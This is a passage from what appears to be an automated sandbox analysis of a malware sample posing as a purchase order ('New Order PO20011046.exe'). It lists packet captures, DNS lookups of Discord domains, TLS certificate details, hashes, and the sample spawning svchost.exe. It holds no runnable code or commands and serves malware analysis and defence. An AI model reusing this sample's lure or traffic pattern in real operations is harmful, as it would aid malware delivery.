                                                                                                          Nov 28, 2020 10:28:51.015717030 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.015727997 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.015741110 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.015768051 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.015773058 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.015820980 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.016603947 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.016625881 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.016640902 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.016657114 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.016673088 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.016700983 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.016746998 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.017535925 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.017554998 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.017571926 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.017589092 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.017605066 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.017606974 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.017657042 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.018409967 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.018426895 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.018444061 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.018520117 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.018940926 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.018965960 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.018985987 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.019001961 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.019006968 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.019027948 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.019038916 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.019089937 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.019875050 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.019905090 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.019929886 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.019953966 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.019979954 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.019982100 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.020010948 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.020693064 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.020719051 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.020740986 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.020762920 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.020764112 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.020786047 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.020787001 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.020840883 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.021576881 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.021605968 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.021630049 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.021651030 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.021673918 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.021702051 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.021764994 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.022514105 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.022543907 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.022564888 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.022569895 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.022587061 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.022609949 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.022613049 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.022901058 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.023304939 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.023339033 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.023361921 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.023385048 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.023401022 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.023407936 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.023432970 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.024189949 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.024219990 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.024241924 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.024245977 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.024262905 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.024287939 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.024296999 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.024341106 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.025019884 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.025048971 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.025072098 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.025094986 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.025099993 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.025118113 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.025142908 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.025805950 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.025826931 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.025844097 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.025866032 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.025877953 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.025885105 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.025911093 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.025938034 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.026617050 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.026634932 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.026650906 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.026700974 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.027138948 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.027158022 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.027173996 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.027193069 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.027195930 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.027209997 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.027223110 CET44349762162.159.130.233192.168.2.4
                                                                                                          Nov 28, 2020 10:28:51.027225971 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.027257919 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:28:51.088018894 CET49762443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:29:42.517039061 CET49755443192.168.2.4162.159.130.233
                                                                                                          Nov 28, 2020 10:29:45.450782061 CET49762443192.168.2.4162.159.130.233

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 28, 2020 10:27:32.105194092 CET4925753192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:32.132352114 CET53492578.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:33.249830008 CET6238953192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:33.276961088 CET53623898.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:34.431451082 CET4991053192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:34.466702938 CET53499108.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:35.653541088 CET5585453192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:35.680615902 CET53558548.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:36.803164959 CET6454953192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:36.830279112 CET53645498.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:37.973012924 CET6315353192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:38.000180006 CET53631538.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.349987030 CET5299153192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:38.377156019 CET53529918.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.482669115 CET5370053192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:38.509799004 CET53537008.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:39.898204088 CET5172653192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:39.925381899 CET53517268.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:41.057318926 CET5679453192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:41.095279932 CET53567948.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:42.109436989 CET5653453192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:42.136538982 CET53565348.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:43.149235010 CET5662753192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:43.176418066 CET53566278.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:44.227277040 CET5662153192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:44.254465103 CET53566218.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:45.288141012 CET6311653192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:45.315246105 CET53631168.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:01.659817934 CET6407853192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:01.686841011 CET53640788.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:11.242733002 CET6480153192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:11.279992104 CET53648018.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:19.475851059 CET6172153192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:19.859035969 CET53617218.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:25.990252972 CET5125553192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:26.017462015 CET53512558.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:26.737153053 CET6152253192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:26.764110088 CET53615228.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:27.368941069 CET5233753192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:27.406620979 CET53523378.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:27.743135929 CET5504653192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:27.770309925 CET53550468.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:28.462677002 CET4961253192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:28.489752054 CET53496128.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:29.264717102 CET4928553192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:29.300700903 CET53492858.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:30.103866100 CET5060153192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:30.130897999 CET53506018.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:31.089325905 CET6087553192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:31.125062943 CET53608758.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:31.554675102 CET5644853192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:31.598839045 CET53564488.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:32.459048033 CET5917253192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:32.488706112 CET53591728.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:32.806169987 CET6242053192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:32.841763020 CET53624208.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:37.820297956 CET6057953192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:37.847316027 CET53605798.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:37.995359898 CET5018353192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:38.022612095 CET53501838.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:41.341943979 CET6153153192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:41.388437033 CET53615318.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:46.367225885 CET4922853192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:46.394448996 CET53492288.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:46.575081110 CET5979453192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:46.603054047 CET53597948.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:29:11.508492947 CET5591653192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:29:11.535631895 CET53559168.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:29:14.363260984 CET5275253192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:29:14.390429974 CET53527528.8.8.8192.168.2.4

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                          Nov 28, 2020 10:27:38.349987030 CET192.168.2.48.8.8.80xcfebStandard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.482669115 CET192.168.2.48.8.8.80xc6f1Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.820297956 CET192.168.2.48.8.8.80x8216Standard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.995359898 CET192.168.2.48.8.8.80x9fd6Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.367225885 CET192.168.2.48.8.8.80x5393Standard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.575081110 CET192.168.2.48.8.8.80x1248Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                          Nov 28, 2020 10:27:38.377156019 CET8.8.8.8192.168.2.40xcfebNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.377156019 CET8.8.8.8192.168.2.40xcfebNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.377156019 CET8.8.8.8192.168.2.40xcfebNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.377156019 CET8.8.8.8192.168.2.40xcfebNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.377156019 CET8.8.8.8192.168.2.40xcfebNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.509799004 CET8.8.8.8192.168.2.40xc6f1No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.509799004 CET8.8.8.8192.168.2.40xc6f1No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.509799004 CET8.8.8.8192.168.2.40xc6f1No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.509799004 CET8.8.8.8192.168.2.40xc6f1No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.509799004 CET8.8.8.8192.168.2.40xc6f1No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.847316027 CET8.8.8.8192.168.2.40x8216No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.847316027 CET8.8.8.8192.168.2.40x8216No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.847316027 CET8.8.8.8192.168.2.40x8216No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.847316027 CET8.8.8.8192.168.2.40x8216No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.847316027 CET8.8.8.8192.168.2.40x8216No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:38.022612095 CET8.8.8.8192.168.2.40x9fd6No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:38.022612095 CET8.8.8.8192.168.2.40x9fd6No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:38.022612095 CET8.8.8.8192.168.2.40x9fd6No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:38.022612095 CET8.8.8.8192.168.2.40x9fd6No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:38.022612095 CET8.8.8.8192.168.2.40x9fd6No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.394448996 CET8.8.8.8192.168.2.40x5393No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.394448996 CET8.8.8.8192.168.2.40x5393No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.394448996 CET8.8.8.8192.168.2.40x5393No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.394448996 CET8.8.8.8192.168.2.40x5393No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.394448996 CET8.8.8.8192.168.2.40x5393No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.603054047 CET8.8.8.8192.168.2.40x1248No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.603054047 CET8.8.8.8192.168.2.40x1248No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.603054047 CET8.8.8.8192.168.2.40x1248No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.603054047 CET8.8.8.8192.168.2.40x1248No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.603054047 CET8.8.8.8192.168.2.40x1248No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)

                                                                                                          HTTPS Packets

                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                          Nov 28, 2020 10:27:38.551489115 CET162.159.135.233443192.168.2.449732CN=ssl711320.cloudflaressl.com CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                          CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Sep 25 02:00:00 CEST 2014Tue Sep 25 01:59:59 CEST 2029
                                                                                                          CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                          Nov 28, 2020 10:28:38.065438986 CET162.159.130.233443192.168.2.449755CN=ssl711320.cloudflaressl.com CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                          CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Sep 25 02:00:00 CEST 2014Tue Sep 25 01:59:59 CEST 2029
                                                                                                          CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                          Nov 28, 2020 10:28:50.550607920 CET162.159.130.233443192.168.2.449762CN=ssl711320.cloudflaressl.com CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                          CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Sep 25 02:00:00 CEST 2014Tue Sep 25 01:59:59 CEST 2029
                                                                                                          CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                                                                                          Code Manipulations

                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          Analysis Process: New Order PO20011046.exe PID: 7048 Parent PID: 5852

                                                                                                          General

                                                                                                          Start time:10:27:36
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\Desktop\New Order PO20011046.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1311424 bytes
                                                                                                          MD5 hash:310A7CA550B9997D0E0BCAF645530303
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: svchost.exe PID: 6700 Parent PID: 7048

                                                                                                          General

                                                                                                          Start time:10:28:09
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\System32\svchost.exe
                                                                                                          Imagebase:0x1300000
                                                                                                          File size:44520 bytes
                                                                                                          MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:moderate

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: New Order PO20011046.exe PID: 1256 Parent PID: 7048

                                                                                                          General

                                                                                                          Start time:10:28:26
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          Imagebase:0x400000
